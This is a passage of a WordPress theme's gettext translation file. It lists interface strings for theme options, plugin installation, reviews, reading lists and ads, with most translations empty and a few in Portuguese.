posts, Please add a new post for this query or change the block " "settings: " msgstr "" #: backend/configs.php:525 msgid "No Gap" msgstr "" #: backend/panels/page.php:35 backend/single-metaboxes.php:63 msgid "No Header" msgstr "" #: backend/class-tgm-plugin-activation.php:3028 msgid "No plugins are available to be activated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2894 msgid "No plugins are available to be installed at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2896 msgid "No plugins are available to be updated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2627 msgid "No plugins to install, update or activate." msgstr "" #: backend/class-tgm-plugin-activation.php:3002 msgid "No plugins were selected to be activated. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2851 msgid "No plugins were selected to be installed. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2853 msgid "No plugins were selected to be updated. No action taken." msgstr "" #: backend/configs.php:168 backend/configs.php:543 msgid "No Sidebar" msgstr "" #: backend/panels/ads.php:242 msgid "No spacing" msgstr "" #: backend/panels/blog-pages.php:53 backend/panels/blog-pages.php:619 #: backend/panels/blog-pages.php:1937 backend/panels/design.php:276 #: backend/panels/header-style.php:74 backend/panels/header-style.php:622 #: backend/single-metaboxes.php:136 backend/single-metaboxes.php:913 msgid "None" msgstr "" #: backend/panels/single-post.php:212 msgid "Normal" msgstr "" #: backend/panels/single-post.php:211 msgid "Normal Italic" msgstr "" #: backend/panels/ads.php:536 msgid "Not Activate - Button Background" msgstr "" #: backend/panels/ads.php:528 msgid "Not Activate - Button Text Color" msgstr "" #: backend/class-tgm-plugin-activation.php:2409 msgid "Not Installed" msgstr "" #: templates/single/review-comment.php:93 msgid "Not that Bad" msgstr "" #: templates/blog.php:13 msgid "Nothing Found" msgstr "" #: backend/panels/header.php:261 templates/header/templates.php:694 #: templates/header/templates.php:699 msgid "Notification" msgstr "" #: backend/panels/header.php:269 msgid "Notification Section" msgstr "" #: templates/blocks/playlist.php:52 msgid "Now Playing" msgstr "" #: backend/panels/single-post.php:1361 msgid "Number of Posts" msgstr "" #: backend/configs.php:560 backend/panels/blog-pages.php:1452 #: backend/panels/blog-pages.php:1860 msgid "Numeric" msgstr "" #: backend/single-metaboxes.php:586 msgid "Offer Destination URL" msgstr "" #: backend/single-metaboxes.php:580 msgid "Offer Label" msgstr "" #: templates/popup.php:242 msgid "Okay, I'll Whitelist" msgstr "" #: templates/parts.php:398 msgid "Older Articles" msgstr "" #: templates/single/review-comment.php:36 msgid "Older Reviews" msgstr "" #: backend/category-settings.php:470 backend/category-settings.php:500 #: backend/configs.php:254 backend/panels/blog-pages.php:494 #: backend/panels/blog-pages.php:524 backend/panels/blog-pages.php:981 #: backend/panels/blog-pages.php:1011 backend/panels/blog-pages.php:1395 #: backend/panels/blog-pages.php:1425 backend/panels/blog-pages.php:1803 #: backend/panels/blog-pages.php:1833 backend/panels/blog-pages.php:2295 #: backend/panels/blog-pages.php:2325 backend/panels/bookmark.php:393 #: backend/panels/bookmark.php:841 msgid "On Mobile" msgstr "" #: backend/category-settings.php:471 backend/category-settings.php:501 #: backend/configs.php:255 backend/panels/blog-pages.php:495 #: backend/panels/blog-pages.php:525 backend/panels/blog-pages.php:982 #: backend/panels/blog-pages.php:1012 backend/panels/blog-pages.php:1396 #: backend/panels/blog-pages.php:1426 backend/panels/blog-pages.php:1804 #: backend/panels/blog-pages.php:1834 backend/panels/blog-pages.php:2296 #: backend/panels/blog-pages.php:2326 backend/panels/bookmark.php:394 #: backend/panels/bookmark.php:842 msgid "On Tablet" msgstr "" #: backend/category-settings.php:472 backend/category-settings.php:502 #: backend/configs.php:256 backend/panels/blog-pages.php:496 #: backend/panels/blog-pages.php:526 backend/panels/blog-pages.php:983 #: backend/panels/blog-pages.php:1013 backend/panels/blog-pages.php:1397 #: backend/panels/blog-pages.php:1427 backend/panels/blog-pages.php:1805 #: backend/panels/blog-pages.php:1835 backend/panels/blog-pages.php:2297 #: backend/panels/blog-pages.php:2327 backend/panels/bookmark.php:395 #: backend/panels/bookmark.php:843 msgid "On Tablet & Mobile" msgstr "" #: includes/sidebars.php:106 includes/sidebars.php:115 #: includes/sidebars.php:124 includes/sidebars.php:134 #: includes/sidebars.php:145 msgid "one of the columns of the footer area." msgstr "" #: backend/theme-options.php:224 msgid "Online Documentation" msgstr "" #: backend/panels/blog-pages.php:1901 msgid "Only display posts in the search results." msgstr "" #: backend/panels/header.php:658 msgid "Only Homepage" msgstr "" #: backend/panels/single-post.php:1450 msgid "Only load posts which has same categories with the current post." msgstr "" #: backend/panels/bookmark.php:55 msgid "Only Logged Users" msgstr "" #: backend/panels/blog-pages.php:1900 msgid "Only Search Posts" msgstr "" #: backend/panels/header.php:659 msgid "Only show the bar in the homepage." msgstr "" #: backend/panels/header.php:90 msgid "Only stick the main menu when scrolling up." msgstr "" #: backend/configs.php:328 msgid "Only Text" msgstr "" #: backend/configs.php:329 msgid "Only Text (Big)" msgstr "" #: templates/blog.php:494 msgid "Oops! Nothing here" msgstr "Ops! Nada aqui" #: backend/panels/optimized.php:230 backend/panels/optimized.php:236 msgid "Open Graph" msgstr "" #: backend/panels/single-post.php:175 msgid "Optimal Line Length" msgstr "" #: backend/panels/single-post.php:172 msgid "" "Optimized the line length of the post content for reading (max width: 730px)." msgstr "" #: backend/single-metaboxes.php:45 msgid "" "Options below will apply to the single page and Elementor page. To config " "for the blog page, navigate to Theme Options > Blog & Achives." msgstr "" #: backend/mega-menu.php:242 msgid "or Attachment/SVG Icon" msgstr "" #: backend/mega-menu.php:197 msgid "or Ruby Templates Shortcode" msgstr "" #: backend/panels/optimized.php:175 msgid "Organization Info" msgstr "" #: backend/panels/optimized.php:121 msgid "Organization Schema Markup" msgstr "" #: backend/panels/single-post.php:586 msgid "" "Organize how you want the entry meta info to appear in the single post pages." msgstr "" #: backend/panels/block-classic.php:51 backend/panels/block-grid.php:51 #: backend/panels/block-grid.php:216 backend/panels/block-grid.php:381 #: backend/panels/block-grid.php:554 backend/panels/block-grid.php:741 #: backend/panels/block-list.php:59 backend/panels/block-list.php:232 #: backend/panels/block-list.php:413 backend/panels/block-list.php:608 #: backend/panels/blog-pages.php:385 backend/panels/blog-pages.php:872 #: backend/panels/blog-pages.php:1286 backend/panels/blog-pages.php:1694 #: backend/panels/blog-pages.php:2186 backend/panels/bookmark.php:284 #: backend/panels/bookmark.php:732 msgid "" "Organize how you want the entry meta to appear. Leave blank to set it as the " "default." msgstr "" #: backend/panels/design.php:394 msgid "Original Ratio - 1536x0" msgstr "" #: backend/panels/design.php:386 msgid "Original Ratio - 860x0" msgstr "" #: backend/panels/adblock.php:35 msgid "" "Our site is an advertising supported site. Please whitelist to support our " "site." msgstr "" #: templates/entry.php:1087 msgid "out of 10" msgstr "" #: templates/entry.php:1090 msgid "out of 5" msgstr "" #: backend/panels/header.php:232 msgid "Override default search icon with a SVG icon." msgstr "" #: backend/single-metaboxes.php:229 msgid "p" msgstr "" #: backend/configs.php:243 msgid "p tag" msgstr "" #: backend/panels/breadcrumb.php:45 msgid "Page Breadcrumbs" msgstr "" #: backend/single-metaboxes.php:56 msgid "Page Header Style" msgstr "" #: backend/panels/blog-pages.php:1029 msgid "Pagination" msgstr "" #: backend/panels/single-post.php:1367 msgid "Pagination Style" msgstr "" #: backend/category-settings.php:225 backend/panels/blog-pages.php:547 #: backend/panels/blog-pages.php:1035 backend/panels/blog-pages.php:1448 #: backend/panels/blog-pages.php:1856 backend/panels/blog-pages.php:2348 #: backend/panels/bookmark.php:569 msgid "Pagination Type" msgstr "" #: backend/panels/single-post.php:171 msgid "Paragraph Line Length" msgstr "" #: backend/configs.php:610 msgid "Pattern Diagonal" msgstr "" #: backend/configs.php:611 msgid "Pattern Diagonal 2" msgstr "" #: backend/configs.php:608 msgid "Pattern Dotted" msgstr "" #: backend/configs.php:609 msgid "Pattern Dotted 2" msgstr "" #: templates/single/review-comment.php:90 msgid "Perfect" msgstr "" #: backend/panels/optimized.php:14 msgid "Performance" msgstr "" #: backend/panels/optimized.php:188 msgid "Phone Number" msgstr "" #: backend/panels/single-post.php:741 backend/panels/single-post.php:880 #: backend/panels/single-post.php:1018 backend/panels/single-post.php:1649 #: templates/parts.php:600 msgid "Pinterest" msgstr "" #: backend/panels/socials.php:55 msgid "Pinterest URL" msgstr "" #: includes/fallbacks.php:273 #, php-format msgid "Please assign a menu to the \"%s\" location under " msgstr "" #: backend/panels/design.php:70 msgid "Please blank to display all categories" msgstr "" #: backend/class-tgm-plugin-activation.php:409 msgid "Please contact the administrator of this site for help." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 #: backend/class-tgm-plugin-activation.php:1030 msgid "" "Please contact the plugin provider and ask them to package their plugin " "according to the WordPress guidelines." msgstr "" #: backend/mega-menu.php:240 backend/panels/socials.php:171 msgid "" "Please ensure that Font Awesome is enabled in \"Theme Options > Theme Design " "> Font Awesome\" if you use this font icon classname." msgstr "" #: backend/single-metaboxes.php:373 msgid "" "Please ensure that the \"Audio\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:420 msgid "" "Please ensure that the \"Gallery\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:318 msgid "" "Please ensure that the \"Video\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/panels/design.php:616 msgid "" "Please ensure that you are using trusted svg sources to avoid XML " "vulnerabilities." msgstr "" #: templates/single/review-comment.php:86 msgid "Please select a rating!" msgstr "" #: backend/panels/header.php:53 msgid "" "Please select setting panel corresponding to the layout you choose for " "setting up background, color and other settings." msgstr "" #: backend/panels/newsletter.php:21 msgid "" "Please update cover images to your own images after importing the theme demo." msgstr "" #: templates/entry.php:1345 msgid "Please update WordPress to the latest version to display this audio." msgstr "" #: templates/entry.php:1292 msgid "Please update WordPress to the latest version to display this video." msgstr "" #: backend/class-tgm-plugin-activation.php:2641 msgid "Plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:399 #: backend/class-tgm-plugin-activation.php:3253 backend/install-plugins.php:81 msgid "Plugin activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3252 msgid "Plugin activation failed." msgstr "" #: backend/class-tgm-plugin-activation.php:404 #, php-format msgid "" "Plugin not activated. A higher version of %s is needed for this theme. " "Please update the plugin." msgstr "" #: backend/panels/single-post.php:362 msgid "Policy Text" msgstr "" #: backend/panels/single-post.php:1388 backend/panels/single-post.php:1394 msgid "Popular Section" msgstr "" #: backend/panels/newsletter.php:77 msgid "Popup Expired" msgstr "" #: backend/panels/newsletter.php:14 backend/panels/newsletter.php:27 msgid "Popup Newsletter" msgstr "" #: backend/panels/bookmark.php:44 msgid "Popup Notification" msgstr "" #: backend/panels/header.php:518 msgid "Popup Sign In" msgstr "" #: backend/configs.php:855 msgid "Portrait (300x1050)" msgstr "" #: templates/single/review-comment.php:51 msgid "Post a Review" msgstr "" #: backend/category-settings.php:365 backend/category-settings.php:381 #: backend/panels/block-classic.php:73 backend/panels/block-grid.php:73 #: backend/panels/block-grid.php:238 backend/panels/block-grid.php:403 #: backend/panels/block-grid.php:576 backend/panels/block-grid.php:763 #: backend/panels/block-list.php:81 backend/panels/block-list.php:254 #: backend/panels/block-list.php:435 backend/panels/block-list.php:630 #: backend/panels/blog-pages.php:408 backend/panels/blog-pages.php:895 #: backend/panels/blog-pages.php:1309 backend/panels/blog-pages.php:1717 #: backend/panels/blog-pages.php:2209 backend/panels/bookmark.php:307 #: backend/panels/bookmark.php:755 msgid "Post Format Icon" msgstr "" #: backend/panels/design.php:470 msgid "Post Format Icons" msgstr "" #: backend/single-metaboxes.php:205 msgid "Post highlights" msgstr "" #: backend/single-metaboxes.php:187 msgid "Post Options" msgstr "" #: backend/single-metaboxes.php:471 msgid "Post Review" msgstr "" #: backend/panels/optimized.php:160 msgid "Post Review Markup" msgstr "" #: backend/single-metaboxes.php:771 msgid "Post Sources" msgstr "" #: backend/panels/single-post.php:296 msgid "Post Tags Bar" msgstr "" #: backend/panels/table-contents.php:23 msgid "Post Type Supported" msgstr "" #: backend/single-metaboxes.php:792 msgid "Post Via" msgstr "" #: backend/panels/design.php:131 msgid "Post View Meta Icon" msgstr "" #: backend/install-plugins.php:48 msgid "Post Views Counter" msgstr "" #: backend/panels/optimized.php:216 msgid "Postal Code" msgstr "" #: templates/entry.php:367 templates/entry.php:401 msgid "Posted" msgstr "" #: templates/entry.php:1159 msgid "Posted by" msgstr "" #: backend/panels/single-post.php:1347 msgid "Posts from Where" msgstr "" #: backend/category-settings.php:164 backend/panels/blog-pages.php:708 msgid "Posts Per Page" msgstr "" #: backend/category-settings.php:169 backend/panels/blog-pages.php:172 #: backend/panels/blog-pages.php:177 backend/panels/blog-pages.php:713 #: backend/panels/blog-pages.php:1123 backend/panels/blog-pages.php:1128 #: backend/panels/blog-pages.php:1532 backend/panels/blog-pages.php:1537 #: backend/panels/blog-pages.php:2024 backend/panels/blog-pages.php:2029 #: backend/panels/bookmark.php:561 msgid "Posts per Page" msgstr "" #: backend/class-tgm-plugin-activation.php:2392 msgid "Pre-Packaged" msgstr "" #: backend/panels/design.php:257 msgid "Prefix" msgstr "" #: backend/panels/optimized.php:74 msgid "Preload Font Icon" msgstr "" #: backend/panels/optimized.php:67 msgid "Preload Google Fonts" msgstr "" #: backend/panels/design.php:641 msgid "Prevent WordPress convert gif to a static image when uploading." msgstr "" #: backend/single-metaboxes.php:338 msgid "Preview Video" msgstr "" #: templates/parts.php:348 msgid "Previous" msgstr "" #: templates/single/templates.php:1016 msgid "Previous Article" msgstr "" #: templates/single/templates.php:564 msgid "Previous Page" msgstr "" #: backend/panels/woocommerce.php:188 msgid "Price Color" msgstr "" #: backend/panels/woocommerce.php:253 msgid "Price Font" msgstr "" #: backend/single-metaboxes.php:592 msgid "Price Offer" msgstr "" #: backend/panels/single-post.php:487 backend/single-metaboxes.php:267 msgid "Primary Category" msgstr "" #: backend/panels/heading.php:49 backend/panels/heading.php:134 msgid "Primary Heading Color" msgstr "" #: backend/panels/single-post.php:822 backend/panels/single-post.php:961 #: backend/panels/single-post.php:1099 backend/panels/single-post.php:1713 msgid "Print" msgstr "" #: backend/panels/privacy.php:14 msgid "Privacy Bar" msgstr "" #: backend/panels/privacy.php:7 msgid "Privacy Notice" msgstr "" #: backend/panels/woocommerce.php:237 msgid "Product Title Font" msgstr "" #: backend/panels/woocommerce.php:71 msgid "Products per Page" msgstr "" #: backend/panels/design.php:110 msgid "Published Date Icon" msgstr "" #: backend/panels/single-post.php:269 backend/panels/single-post.php:275 msgid "Quick View Info" msgstr "" #: templates/single/review-comment.php:89 msgid "Rate…" msgstr "" #: backend/panels/reaction.php:31 msgid "Reaction Heading" msgstr "" #: backend/panels/reaction.php:37 msgid "Reaction Items" msgstr "" #: backend/panels/reaction.php:23 msgid "Reaction Section" msgstr "" #: backend/configs.php:409 backend/panels/design.php:275 msgid "read (Reading Time)" msgstr "" #: templates/template-helpers.php:238 templates/template-helpers.php:382 msgid "Read More" msgstr "Leia mais" #: backend/category-settings.php:425 backend/panels/block-classic.php:106 #: backend/panels/block-grid.php:106 backend/panels/block-grid.php:271 #: backend/panels/block-grid.php:436 backend/panels/block-grid.php:609 #: backend/panels/block-grid.php:796 backend/panels/block-list.php:114 #: backend/panels/block-list.php:287 backend/panels/block-list.php:468 #: backend/panels/block-list.php:663 backend/panels/blog-pages.php:453 #: backend/panels/blog-pages.php:940 backend/panels/blog-pages.php:1354 #: backend/panels/blog-pages.php:1762 backend/panels/blog-pages.php:2254 #: backend/panels/bookmark.php:352 backend/panels/bookmark.php:800 #: backend/panels/design.php:535 backend/panels/typography.php:530 msgid "Read More Button" msgstr "" #: backend/panels/typography.php:538 msgid "Read More Font" msgstr "" #: backend/panels/design.php:549 msgid "Read More Icon" msgstr "" #: backend/panels/design.php:543 msgid "Read More Label" msgstr "" #: backend/panels/single-post.php:1564 msgid "Reading Font Resizer" msgstr "" #: backend/panels/single-post.php:1736 backend/panels/single-post.php:1745 msgid "Reading Indicator" msgstr "" #: backend/panels/bookmark.php:88 backend/panels/bookmark.php:106 #: templates/header/templates.php:710 msgid "Reading List" msgstr "" #: backend/panels/bookmark.php:98 msgid "Reading List Header" msgstr "" #: backend/panels/design.php:160 msgid "Reading Speed" msgstr "" #: backend/panels/single-post.php:661 backend/panels/single-post.php:667 msgid "Reading Time" msgstr "" #: backend/panels/design.php:138 msgid "Reading Time Meta Icon" msgstr "" #: templates/single/templates.php:1485 msgid "Reading:" msgstr "Leitura:" #: templates/blog.php:497 msgid "Ready to publish your first post?" msgstr "" #: templates/blog.php:17 #, php-format msgid "" "Ready to publish your first post? Get started here." msgstr "" #: backend/class-tgm-plugin-activation.php:2370 backend/panels/bookmark.php:502 msgid "Recommended" msgstr "" #: backend/panels/bookmark.php:520 msgid "Recommended for You" msgstr "" #: backend/panels/bookmark.php:512 msgid "Recommended Heading" msgstr "" #: backend/panels/design.php:315 msgid "Recommended select the top position if you have people images." msgstr "" #: backend/panels/single-post.php:777 backend/panels/single-post.php:916 #: backend/panels/single-post.php:1054 backend/panels/single-post.php:1681 #: templates/parts.php:639 msgid "Reddit" msgstr "" #: backend/panels/socials.php:128 msgid "Reddit URL " msgstr "" #: backend/panels/header.php:527 backend/panels/login.php:95 msgid "Redirect links should be inner links." msgstr "" #: backend/panels/login.php:93 msgid "Redirect Settings" msgstr "" #: backend/panels/bookmark.php:56 msgid "Redirect to Login for Guest Users" msgstr "" #: backend/panels/login.php:104 msgid "Redirect to this link after logged in." msgstr "" #: backend/panels/header.php:619 backend/panels/login.php:112 msgid "Redirect to this link after successful logout." msgstr "" #: backend/panels/login.php:58 msgid "Redirect to this link when clicking on the logo." msgstr "" #: backend/panels/dark-mode.php:36 msgid "Reduce the featured image opacity when enabled the dark mode." msgstr "" #: backend/panels/sidebar.php:15 msgid "" "Refresh your browser after creating new sidebars to update your changes." msgstr "" #: templates/popup.php:206 msgid "Register" msgstr "" #: backend/panels/single-post.php:1249 msgid "Related & Popular" msgstr "" #: backend/panels/single-post.php:1304 msgid "Related Heading" msgstr "" #: backend/panels/amp.php:222 backend/panels/single-post.php:1290 #: backend/panels/single-post.php:1296 msgid "Related Section" msgstr "" #: backend/panels/single-post.php:1266 msgid "Related Shortcode" msgstr "" #: bookmark/template-helpers.php:30 templates/entry.php:286 msgid "Remove" msgstr "Remover" #: backend/panels/amp.php:69 msgid "Remove Footer Switcher" msgstr "" #: backend/panels/amp.php:70 msgid "Remove the \"Exit Mobile Version\" link at the footer." msgstr "" #: bookmark/bookmark.php:56 msgid "Removed from reading list" msgstr "" #: backend/configs.php:426 msgid "Replace for Entry Meta" msgstr "" #: backend/class-tgm-plugin-activation.php:2367 msgid "Required" msgstr "" #: backend/class-tgm-plugin-activation.php:2421 msgid "Required Update not Available" msgstr "" #: backend/class-tgm-plugin-activation.php:2424 msgid "Requires Update" msgstr "" #: templates/header/templates.php:758 msgid "Resizer" msgstr "Redimensionador" #: backend/category-settings.php:465 backend/panels/block-classic.php:129 #: backend/panels/block-grid.php:129 backend/panels/block-grid.php:294 #: backend/panels/block-grid.php:459 backend/panels/block-grid.php:632 #: backend/panels/block-grid.php:819 backend/panels/block-list.php:137 #: backend/panels/block-list.php:310 backend/panels/block-list.php:491 #: backend/panels/block-list.php:686 backend/panels/blog-pages.php:490 #: backend/panels/blog-pages.php:977 backend/panels/blog-pages.php:1391 #: backend/panels/blog-pages.php:1799 backend/panels/blog-pages.php:2291 #: backend/panels/bookmark.php:389 backend/panels/bookmark.php:837 msgid "Responsive - Hide Entry Category" msgstr "" #: backend/category-settings.php:495 backend/panels/block-classic.php:155 #: backend/panels/block-grid.php:155 backend/panels/block-grid.php:320 #: backend/panels/block-grid.php:485 backend/panels/block-grid.php:658 #: backend/panels/block-grid.php:845 backend/panels/block-list.php:163 #: backend/panels/block-list.php:336 backend/panels/block-list.php:517 #: backend/panels/block-list.php:712 backend/panels/blog-pages.php:520 #: backend/panels/blog-pages.php:1007 backend/panels/blog-pages.php:1421 #: backend/panels/blog-pages.php:1829 backend/panels/blog-pages.php:2321 #: backend/panels/bookmark.php:411 backend/panels/bookmark.php:867 msgid "Responsive - Hide Excerpt" msgstr "" #: backend/panels/general.php:48 msgid "Restore/Backup" msgstr "" #: backend/panels/general.php:55 msgid "Restore/Backup Theme Options" msgstr "" #: backend/panels/logo.php:62 msgid "Retina Main Logo" msgstr "" #: templates/blog.php:22 msgid "Return to Home" msgstr "" #: templates/blog.php:505 templates/page.php:145 msgid "Return to Homepage" msgstr "Voltar a página inicial" #: backend/class-tgm-plugin-activation.php:397 backend/install-plugins.php:80 msgid "Return to Required Plugins Installer" msgstr "" #: backend/class-tgm-plugin-activation.php:398 #: backend/class-tgm-plugin-activation.php:920 #: backend/class-tgm-plugin-activation.php:2627 #: backend/class-tgm-plugin-activation.php:3674 msgid "Return to the Dashboard" msgstr "" #: backend/single-metaboxes.php:466 msgid "Review" msgstr "" #: backend/panels/single-post.php:1156 msgid "Review & Rating" msgstr "" #: templates/single/review-comment.php:43 msgid "Review Closed!" msgstr "" #: backend/single-metaboxes.php:534 msgid "Review Image" msgstr "" #: backend/category-settings.php:373 backend/panels/block-classic.php:58 #: backend/panels/block-grid.php:58 backend/panels/block-grid.php:223 #: backend/panels/block-grid.php:388 backend/panels/block-grid.php:561 #: backend/panels/block-grid.php:748 backend/panels/block-list.php:66 #: backend/panels/block-list.php:239 backend/panels/block-list.php:420 #: backend/panels/block-list.php:615 backend/panels/blog-pages.php:392 #: backend/panels/blog-pages.php:879 backend/panels/blog-pages.php:1293 #: backend/panels/blog-pages.php:1701 backend/panels/blog-pages.php:2193 #: backend/panels/bookmark.php:291 backend/panels/bookmark.php:739 msgid "Review Meta" msgstr "" #: backend/panels/block-classic.php:66 backend/panels/block-grid.php:66 #: backend/panels/block-grid.php:231 backend/panels/block-grid.php:396 #: backend/panels/block-grid.php:569 backend/panels/block-grid.php:756 #: backend/panels/block-list.php:74 backend/panels/block-list.php:247 #: backend/panels/block-list.php:428 backend/panels/block-list.php:623 #: backend/panels/blog-pages.php:400 backend/panels/blog-pages.php:887 #: backend/panels/blog-pages.php:1301 backend/panels/blog-pages.php:1709 #: backend/panels/blog-pages.php:2201 backend/panels/bookmark.php:299 #: backend/panels/bookmark.php:747 msgid "Review Meta Description" msgstr "" #: backend/single-metaboxes.php:499 msgid "Review Overview" msgstr "" #: backend/single-metaboxes.php:870 msgid "Review Schema Markup" msgstr "" #: backend/panels/color.php:132 msgid "Review Star Color" msgstr "" #: backend/panels/woocommerce.php:204 msgid "Review Start Color" msgstr "" #: backend/single-metaboxes.php:496 msgid "Review Title" msgstr "" #: backend/single-metaboxes.php:503 msgid "Review Type" msgstr "" #: backend/configs.php:181 backend/configs.php:545 backend/configs.php:824 #: backend/panels/login.php:42 msgid "Right" msgstr "" #: backend/panels/design.php:665 backend/panels/design.php:672 msgid "Round Corner" msgstr "" #: templates/parts.php:651 msgid "Rss" msgstr "" #: backend/panels/socials.php:152 msgid "Rss URL " msgstr "" #: backend/panels/design.php:305 msgid "" "Run regenerate thumbnail if you add/remove crop sizes. Please read " "documentation for further information." msgstr "" #: backend/panels/reaction.php:43 msgid "Sad" msgstr "" #: backend/panels/woocommerce.php:220 msgid "Sale Icon Background" msgstr "" #: backend/panels/single-post.php:1352 backend/panels/single-post.php:1449 msgid "Same Categories" msgstr "" #: backend/panels/single-post.php:1351 msgid "Same Tags" msgstr "" #: backend/panels/single-post.php:1350 msgid "Same Tags & Categories" msgstr "" #: bookmark/template-helpers.php:29 msgid "Save it" msgstr "Salve isso" #: backend/single-metaboxes.php:509 msgid "Score (1 > 10)" msgstr "" #: backend/single-metaboxes.php:526 msgid "Score (1 > 10) or Rating (1 > 5)" msgstr "" #: backend/panels/ads.php:101 backend/panels/ads.php:290 msgid "Script" msgstr "" #: backend/panels/ads.php:130 backend/panels/ads.php:319 msgid "Script - Ad Size" msgstr "" #: backend/panels/ads.php:122 backend/panels/ads.php:311 msgid "Script - Ad/Adsense Code" msgstr "" #: backend/panels/ads.php:141 backend/panels/ads.php:330 msgid "Script - Size on Desktop" msgstr "" #: backend/panels/ads.php:157 backend/panels/ads.php:346 msgid "Script - Size on Mobile" msgstr "" #: backend/panels/ads.php:149 backend/panels/ads.php:338 msgid "Script - Size on Tablet" msgstr "" #: backend/panels/ads.php:116 backend/panels/ads.php:305 msgid "Script Settings" msgstr "" #: backend/panels/newsletter.php:96 msgid "Scroll Distance" msgstr "" #: backend/panels/blog-pages.php:1886 backend/panels/header.php:190 #: searchform.php:18 templates/header/templates.php:345 templates/parts.php:477 msgid "Search" msgstr "Buscar" #: templates/header/templates.php:349 templates/parts.php:485 msgid "search" msgstr "buscar" #: templates/parts.php:474 msgid "Search and hit enter..." msgstr "" #: backend/panels/blog-pages.php:1895 msgid "Search Filter" msgstr "" #: searchform.php:14 msgid "Search for:" msgstr "" #: backend/panels/blog-pages.php:2418 msgid "Search Form" msgstr "" #: backend/panels/blog-pages.php:1961 msgid "Search Header" msgstr "" #: backend/panels/header.php:187 msgid "Search Heading" msgstr "" #: backend/panels/general.php:36 searchform.php:9 templates/parts.php:480 msgid "Search Headlines, News..." msgstr "" #: templates/blog.php:232 #, php-format msgid "Search Results for: %s" msgstr "Resultados da busca por: %s" #: templates/single/templates.php:1587 msgid "Section" msgstr "" #: backend/panels/ads.php:221 msgid "Section Background" msgstr "" #: backend/panels/bookmark.php:111 backend/panels/bookmark.php:454 msgid "Section Description" msgstr "" #: backend/panels/bookmark.php:104 backend/panels/bookmark.php:447 #: backend/panels/bookmark.php:518 msgid "Section Heading" msgstr "" #: backend/mega-menu.php:204 backend/panels/header.php:141 msgid "Section Width" msgstr "" #: backend/panels/footer.php:82 msgid "" "Select \"Use Ruby Template\" under the \"Footer Widgets Layout\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/header.php:43 msgid "" "Select \"Use Ruby Template\" under the \"Global Header Style\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/heading.php:75 backend/panels/heading.php:160 msgid "Select a accent color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:58 backend/panels/heading.php:143 msgid "Select a accent color for the heading." msgstr "" #: backend/panels/header-style.php:219 backend/panels/header-style.php:508 #: backend/panels/header-style.php:774 msgid "Select a accent color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:141 backend/panels/header-style.php:285 #: backend/panels/header-style.php:429 backend/panels/header-style.php:696 msgid "Select a accent color when hovering." msgstr "" #: backend/panels/ads.php:98 msgid "Select a ad type for displaying in the top of the website." msgstr "" #: backend/panels/ads.php:286 msgid "Select a ad type for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:417 msgid "Select a align style for the adverts." msgstr "" #: backend/single-metaboxes.php:378 msgid "" "Select a audio layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/woocommerce.php:229 msgid "Select a background color for the \"Add to Cart\" button." msgstr "" #: backend/panels/header.php:483 msgid "Select a background color for the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:430 msgid "Select a background color for the collapse section." msgstr "" #: backend/panels/header.php:463 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu in the dark mode." msgstr "" #: backend/panels/header.php:409 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu." msgstr "" #: backend/panels/header-style.php:192 backend/panels/header-style.php:481 #: backend/panels/header-style.php:747 msgid "" "Select a background color for the navigation bar of this header in the dark " "mode." msgstr "" #: backend/panels/header-style.php:113 backend/panels/header-style.php:401 #: backend/panels/header-style.php:668 msgid "Select a background color for the navigation bar of this header." msgstr "" #: backend/panels/ads.php:537 msgid "" "Select a background color for the slide up toggle button when not activated." msgstr "" #: backend/panels/header-style.php:228 backend/panels/header-style.php:517 #: backend/panels/header-style.php:783 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header in the dark mode." msgstr "" #: backend/panels/header-style.php:150 backend/panels/header-style.php:438 #: backend/panels/header-style.php:705 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header." msgstr "" #: backend/panels/single-post.php:1762 msgid "Select a background color for this bar." msgstr "" #: backend/panels/woocommerce.php:221 msgid "Select a background color value for the sale icon." msgstr "" #: backend/panels/color.php:103 msgid "" "Select a background for the dark mode icon (Moon icon) of the dark mode " "switcher button to fit with the main navigation color." msgstr "" #: backend/panels/footer.php:41 msgid "Select a background for the footer in the dark mode: image, color, etc" msgstr "" #: backend/panels/footer.php:31 msgid "Select a background for the footer: image, color, etc" msgstr "" #: backend/panels/ads.php:230 msgid "Select a background for this ad section in the dark mode." msgstr "" #: backend/panels/ads.php:222 msgid "Select a background for this ad section." msgstr "" #: backend/panels/ads.php:507 msgid "Select a background for this section in the dark mode." msgstr "" #: backend/panels/ads.php:501 msgid "Select a background for this section." msgstr "" #: backend/panels/blog-pages.php:1493 msgid "Select a background style for the archive header." msgstr "" #: backend/panels/blog-pages.php:1085 msgid "Select a background style for the author header." msgstr "" #: backend/category-settings.php:93 backend/panels/blog-pages.php:91 msgid "Select a background style for this category header." msgstr "" #: backend/panels/bookmark.php:134 backend/panels/bookmark.php:484 msgid "Select a background style for this heading." msgstr "" #: backend/panels/block-grid.php:527 backend/panels/block-grid.php:714 #: backend/panels/block-list.php:378 backend/panels/block-list.php:573 msgid "Select a box style for the post listing." msgstr "" #: backend/panels/color.php:124 msgid "Select a color for post excerpt text." msgstr "" #: backend/panels/block-list.php:532 backend/panels/block-list.php:727 msgid "" "Select a color for the background or border style in the dark mode or light " "scheme mode." msgstr "" #: backend/panels/block-grid.php:680 backend/panels/block-grid.php:867 msgid "Select a color for the background or border style in the dark mode." msgstr "" #: 